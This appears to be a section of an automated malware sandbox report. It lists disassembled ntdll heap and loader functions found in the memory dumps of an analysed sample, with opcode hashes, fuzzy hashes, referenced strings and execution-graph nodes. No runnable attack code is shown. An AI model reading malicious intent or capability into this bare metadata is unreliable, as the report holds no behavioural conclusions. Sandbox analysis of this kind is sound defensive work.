                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                  • API String ID: 3446177414-3492000579
                                                                  • Opcode ID: 6e8e2bbd569c41576c4ecf89a5ff959c85a5eaf58a7e221c07598c467abc38cb
                                                                  • Instruction ID: 2e5169f40c2080f5f7dfa290f206381698a9337a5893022bfcf2956961b66591
                                                                  • Opcode Fuzzy Hash: 6e8e2bbd569c41576c4ecf89a5ff959c85a5eaf58a7e221c07598c467abc38cb
                                                                  • Instruction Fuzzy Hash: 63710F74901688EFDB02CFA8D490AADFBF2FF59324F44815AE444AB351CB39A941CF52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377A6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 37809854, 37809895
                                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37809843
                                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37809885
                                                                  • LdrpLoadShimEngine, xrefs: 3780984A, 3780988B
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-3589223738
                                                                  • Opcode ID: 08d3b9f3de18e668944e8197994cddc8292591e6b17f0265e4e08291d29ab0e6
                                                                  • Instruction ID: 78f2a250da51b3e711e22baf54d546d26aa16e757d5f775c9434acd87cde67be
                                                                  • Opcode Fuzzy Hash: 08d3b9f3de18e668944e8197994cddc8292591e6b17f0265e4e08291d29ab0e6
                                                                  • Instruction Fuzzy Hash: 06513476A013449FEB54DBA8CC59BED7BB2AB55314F040225E410FF395DB78AC42CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377DDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                  • API String ID: 3446177414-3224558752
                                                                  • Opcode ID: 56ccd11ceab7f8907c5c9d809fb6c2d0a81d0b4344fb51098eb4c19e298c20e3
                                                                  • Instruction ID: 558c6b242c907c92e972e53850ed24470f74b36279c1dd9dc6f13976920d372a
                                                                  • Opcode Fuzzy Hash: 56ccd11ceab7f8907c5c9d809fb6c2d0a81d0b4344fb51098eb4c19e298c20e3
                                                                  • Instruction Fuzzy Hash: CD416B74505744DFE701CF68C849BA9B7A4EF80360F008569E415AF392CB38A981CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3785ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • HEAP: , xrefs: 3785ECDD
                                                                  • ---------------------------------------, xrefs: 3785EDF9
                                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3785EDE3
                                                                  • Entry Heap Size , xrefs: 3785EDED
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                  • API String ID: 3446177414-1102453626
                                                                  • Opcode ID: 3fe4ab6dcfa6e64276c663c80f6c667cc5b791e8511cf12336a6885ea1d5aa62
                                                                  • Instruction ID: 64e51f1ece31440549bee13e989ff2a56a35196330bce09159c77168365643b3
                                                                  • Opcode Fuzzy Hash: 3fe4ab6dcfa6e64276c663c80f6c667cc5b791e8511cf12336a6885ea1d5aa62
                                                                  • Instruction Fuzzy Hash: B0419F79A01219DFDB44CF1CC889A19BBE5EF5937472981A9D408AF311D735EC42CF84
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377DDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                  • API String ID: 3446177414-1222099010
                                                                  • Opcode ID: f53e9f30a5dfbae0fce8148ab28cd95393eb66fa6d07e5a3b8dfc42a9ae7a750
                                                                  • Instruction ID: 681d3ad62dae5e9eb50436a8a8c7e9ca4edf3b984e3bc9bc906973729c747a6d
                                                                  • Opcode Fuzzy Hash: f53e9f30a5dfbae0fce8148ab28cd95393eb66fa6d07e5a3b8dfc42a9ae7a750
                                                                  • Instruction Fuzzy Hash: 0A3149751127C4FFE751CF58C419FA57BA4EF02764F000496E412AF662CB6DA640CE52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B9046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$@
                                                                  • API String ID: 3446177414-1194432280
                                                                  • Opcode ID: eba3a85155fc3abbb209cfba712a6a6fb20afe7f968922d87eee471efdbecee5
                                                                  • Instruction ID: 590ff04560e6cc5be885c6fc1bc550eb53d05bf190c4f4853a864aaee9e56c53
                                                                  • Opcode Fuzzy Hash: eba3a85155fc3abbb209cfba712a6a6fb20afe7f968922d87eee471efdbecee5
                                                                  • Instruction Fuzzy Hash: 598118B1D00269DBDB21CF54CC45BEEB7B8AB48750F0045EAE919BB250E7349E85CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E4C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • LdrpFindDllActivationContext, xrefs: 37823440, 3782346C
                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 3782344A, 37823476
                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 37823466
                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 37823439
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                  • API String ID: 3446177414-3779518884
                                                                  • Opcode ID: 41a1013e268a98b2f3aa9aabdb98b3949c049a75076d552868546ea27bf0bebc
                                                                  • Instruction ID: 0861ce2823b094058ed0d3f3451182a05cb729a63a5cb955f13497a3d0c1ef71
                                                                  • Opcode Fuzzy Hash: 41a1013e268a98b2f3aa9aabdb98b3949c049a75076d552868546ea27bf0bebc
                                                                  • Instruction Fuzzy Hash: 0B312CB6A01351AFFB119B08CC49B65B3ADFB453B4F428966F9046FD70E764ACC0C692
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377AF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 3446177414-3610490719
                                                                  • Opcode ID: cb308e33dc60d5433b9f078945f2f8ed87a6c056140def47d2d07b6f7b3758c0
                                                                  • Instruction ID: acfe50d73c44f3f6f9397418fc48d6f3a419313cc9402c31559cea77bebd2763
                                                                  • Opcode Fuzzy Hash: cb308e33dc60d5433b9f078945f2f8ed87a6c056140def47d2d07b6f7b3758c0
                                                                  • Instruction Fuzzy Hash: 6E91CE76205741EFF355DF24C888B7AB7A6AF85750F000A59E954DF381DB38E842CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377D0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • LdrpCheckModule, xrefs: 37819F24
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 37819F2E
                                                                  • Failed to allocated memory for shimmed module list, xrefs: 37819F1C
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-161242083
                                                                  • Opcode ID: 8a9e85d9865ea85874d9117144dfc694b35db4b22ae99400446fe8f0d0e02a50
                                                                  • Instruction ID: bf0d226cb57d024b053d5a9ffad52a7b0c3919ddfaa5333c8aaa8e6498ccc8b5
                                                                  • Opcode Fuzzy Hash: 8a9e85d9865ea85874d9117144dfc694b35db4b22ae99400446fe8f0d0e02a50
                                                                  • Instruction Fuzzy Hash: 7B710174A04209DFEB04DF68CC85BAEBBF5EB49318F14446DE806EB650E778AD42CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377DEE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1bfec5c937b411c5ec9dfce35bbd81e3cb9a8e95f2fbaeeac52cf513fd6362a6
                                                                  • Instruction ID: 84b72a5be0ad741f7067f31aed985dc9edc8a7c467dfe9df8ad84b048c1dad5a
                                                                  • Opcode Fuzzy Hash: 1bfec5c937b411c5ec9dfce35bbd81e3cb9a8e95f2fbaeeac52cf513fd6362a6
                                                                  • Instruction Fuzzy Hash: 0AE11274D00708CFDB25CFA9C994A9DBBF1FF48310F20492AE556AB261DB75A982CF10
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3788A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 4fa59d738ec121beedd71ad983531ccbf3fdfd3a9e0db32cc51372758ff4d2ea
                                                                  • Instruction ID: 6ca0c5128fa06033dff567a71c0c7fdeddad090cdc9399f96061e17e5971b71a
                                                                  • Opcode Fuzzy Hash: 4fa59d738ec121beedd71ad983531ccbf3fdfd3a9e0db32cc51372758ff4d2ea
                                                                  • Instruction Fuzzy Hash: C3516B78705616EFEB08CE28C8D0BA9B7E1BBA9360B10416DD516D7790DB75FC41CB82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E7A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                  • String ID:
                                                                  • API String ID: 4281723722-0
                                                                  • Opcode ID: 65ac3d78833b8723945a24fe8dd5318707575d9186e8d788a14808406e5baef2
                                                                  • Instruction ID: f3a7654983fe05b458d2fe6f9f032bfb1ecaa76f2b006b3b13959a26787fe858
                                                                  • Opcode Fuzzy Hash: 65ac3d78833b8723945a24fe8dd5318707575d9186e8d788a14808406e5baef2
                                                                  • Instruction Fuzzy Hash: 32314475E41218AFCF01DFA8D849B9DBBF0AB48320F10412AE520B7380DB389941CF61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: acc0214c6ba48ec8b41ce19527ba2cf99c46042ca0969fe315b91665b1ca37e7
                                                                  • Instruction ID: 7cbcae89c2201ad4413f42aaeac18bfbfbdb92ea8f3d47d7f0af271a8732dba8
                                                                  • Opcode Fuzzy Hash: acc0214c6ba48ec8b41ce19527ba2cf99c46042ca0969fe315b91665b1ca37e7
                                                                  • Instruction Fuzzy Hash: 27324574D043699FEF31CF64C888BE9BBB1BB08354F0045EAD549AB241DB75AA84CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E4B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0$Flst
                                                                  • API String ID: 0-758220159
                                                                  • Opcode ID: c3f4f2c5a56fd7a4d4fc14efce613246d01a9c4a429cf95915aeefd0ddd9f40f
                                                                  • Instruction ID: c68a96785f9455d70297f60698096793be1731f853ac70716ac9b76b4b38a343
                                                                  • Opcode Fuzzy Hash: c3f4f2c5a56fd7a4d4fc14efce613246d01a9c4a429cf95915aeefd0ddd9f40f
                                                                  • Instruction Fuzzy Hash: 85518BB5A017088FEB14CF95C888759FBF9EF447A5F14846AE0499FA50EB7099C1CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377AE67A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: ^z7
                                                                  • API String ID: 3446177414-3359154134
                                                                  • Opcode ID: 160a3ede276958bb3198c9033ceb01d09196b1701dff10441eb5f3dd08945b4a
                                                                  • Instruction ID: f9e8729ad1c687536593a47203d7876d7629808c7163e6f9bbada11d1a33283d
                                                                  • Opcode Fuzzy Hash: 160a3ede276958bb3198c9033ceb01d09196b1701dff10441eb5f3dd08945b4a
                                                                  • Instruction Fuzzy Hash: C941A2B9A10201DFEB55CF19C8855657BF6FF98764B10896AEC08CF360DB74E891CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377ADF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: 0$0
                                                                  • API String ID: 3446177414-203156872
                                                                  • Opcode ID: 2a97cdbe3f2e32c48e973a36a8de73350a06c1248a4e6a1e49d89650044c8cba
                                                                  • Instruction ID: 8d1847b02dec7d4e2ae81de0f07d7fced8c776f55e3a346ca7c0143c7837a4d5
                                                                  • Opcode Fuzzy Hash: 2a97cdbe3f2e32c48e973a36a8de73350a06c1248a4e6a1e49d89650044c8cba
                                                                  • Instruction Fuzzy Hash: BF416BB56087029FD340CF28C844A5BBBE5BB89354F044A2EF498EB304D775EA05CF96
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377AE880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: z7$mz7
                                                                  • API String ID: 3446177414-454254324
                                                                  • Opcode ID: 2565aba016238411af01c1b45f60481aa839d1aa437d6274c45acf077cdfda44
                                                                  • Instruction ID: da483aa23799eacf6cb918f6d1218728fcf5a60b63537a153a42c16f18558e74
                                                                  • Opcode Fuzzy Hash: 2565aba016238411af01c1b45f60481aa839d1aa437d6274c45acf077cdfda44
                                                                  • Instruction Fuzzy Hash: 1711B4B6A01208AFDF11CF98D985ADEBBB4FB4C360F10411AF911B7340D735A954CB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:0%
                                                                  Dynamic/Decrypted Code Coverage:96.3%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:107
                                                                  Total number of Limit Nodes:3
                                                                  execution_graph 64337 3189313 14 API calls 64481 3105900 337 API calls 64343 30fc310 338 API calls 64345 30fcb10 GetPEB GetPEB GetPEB GetPEB 64484 310a130 13 API calls 64349 30cbf20 358 API calls 64350 310ab20 345 API calls 64351 310cb20 341 API calls 64487 3108520 13 API calls 64323 3112b20 64325 3112b2a 64323->64325 64326 3112b31 64325->64326 64327 3112b3f LdrInitializeThunk 64325->64327 64355 3108322 559 API calls 64491 314c920 337 API calls 64358 314d729 350 API calls 64359 310a350 417 API calls 64498 30ee547 564 API calls 64362 310bb5b 336 API calls 64363 30ca740 421 API calls 64499 30cc140 342 API calls 64500 310415f 335 API calls 64505 314cd40 333 API calls 64507 30db950 553 API calls 64508 3108d4f 356 API calls 64513 3107960 337 API calls 64515 30cc170 592 API calls 64371 30d1f70 351 API calls 64372 30faf72 361 API calls 64374 3109790 413 API calls 64520 3109580 562 API calls 64522 30c8196 13 API calls 64525 30ce9ac 591 API calls 64527 310b9b0 16 API calls 64387 3108fbc 354 API calls 64389 31043a0 356 API calls 64394 3176bde 574 API calls 64395 30ce3c0 403 API calls 64396 30cbfc0 16 API calls 64532 30c81c0 201 API calls 64533 30d1dc0 23 API calls 64534 30e51c0 381 API calls 64398 310bbc0 551 API calls 64537 310c5c6 557 API calls 64400 30c9fd0 333 API calls 64401 3151fc9 593 API calls 64402 30d3bd0 23 API calls 64318 31129f0 LdrInitializeThunk 64540 30fe9e0 349 API calls 64541 31069e0 209 API calls 64407 30d1ffa LdrInitializeThunk 64408 30c73f0 11 API calls 64544 3112010 14 API calls 64545 30c640d 559 API calls 64547 30cec0b 592 API calls 64413 30fd600 692 API calls 64415 30c821b 358 API calls 64416 30c9610 558 API calls 64551 30d2410 601 API calls 64552 30d9810 588 API calls 64420 3107a33 708 API calls 64556 30d2022 20 API calls 64425 30c7a30 353 API calls 64559 30cb830 555 API calls 64431 314d250 335 API calls 64432 314de50 205 API calls 64433 30d3640 346 API calls 64434 30fea40 355 API calls 64435 310f240 338 API calls 64442 30cb260 352 API calls 64569 30c7860 202 API calls 64570 30d3c60 25 API calls 64330 2a68bd7 64331 2a68bda RtlFreeHeap 64330->64331 64332 2a68bf1 64330->64332 64331->64332 64333 2a68ba3 64331->64333 64333->64330 64333->64332 64333->64333 64575 310b890 375 API calls 64447 314d69d 334 API calls 64448 3152e9f 383 API calls 64452 30ca290 547 API calls 64453 30cfe90 19 API calls 64580 30cc090 350 API calls 64454 30dc690 GetPEB 64455 30ed690 12 API calls 64581 30ce0a4 357 API calls 64456 30cbea0 343 API calls 64457 30d06a0 357 API calls 64582 30d00a0 565 API calls 64461 31122a0 707 API calls 64462 30c82b0 334 API calls 64585 314f0d0 200 API calls 64586 30cb0c0 419 API calls 64464 31032c0 338 API calls 64587 310a8c0 12 API calls 64588 3106cc0 339 API calls 64594 30ff4d0 345 API calls 64467 31062f0 601 API calls 64468 31096f0 340 API calls 64597 314ccf0 201 API calls 64598 314f4fe 335 API calls 64469 30c72e0 332 API calls 64599 30d58e0 766 API calls 64470 30f66e0 432 API calls 64472 314f6e0 563 API calls 64602 3150cee 14 API calls 64603 30facf0 342 API calls 64604 30fccf0 GetPEB GetPEB

                                                                  Executed Functions

                                                                  Function 031134E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 32 31134e0-31134ec LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3843e5d2a267421b08a8048b4678008742243ded7a0016b4bbc36a6d5f84d1ae
                                                                  • Instruction ID: 8e0beb934944e06cc49af581745ca9eb190da90744e457fb6ee0d52d31ecd7c4
                                                                  • Opcode Fuzzy Hash: 3843e5d2a267421b08a8048b4678008742243ded7a0016b4bbc36a6d5f84d1ae
                                                                  • Instruction Fuzzy Hash: 6090023160511803D500A1585714706140587D4201F62C815E4415568DC7A9896175B2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03112B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 23 3112b10-3112b1c LdrInitializeThunk
                                                                  APIs
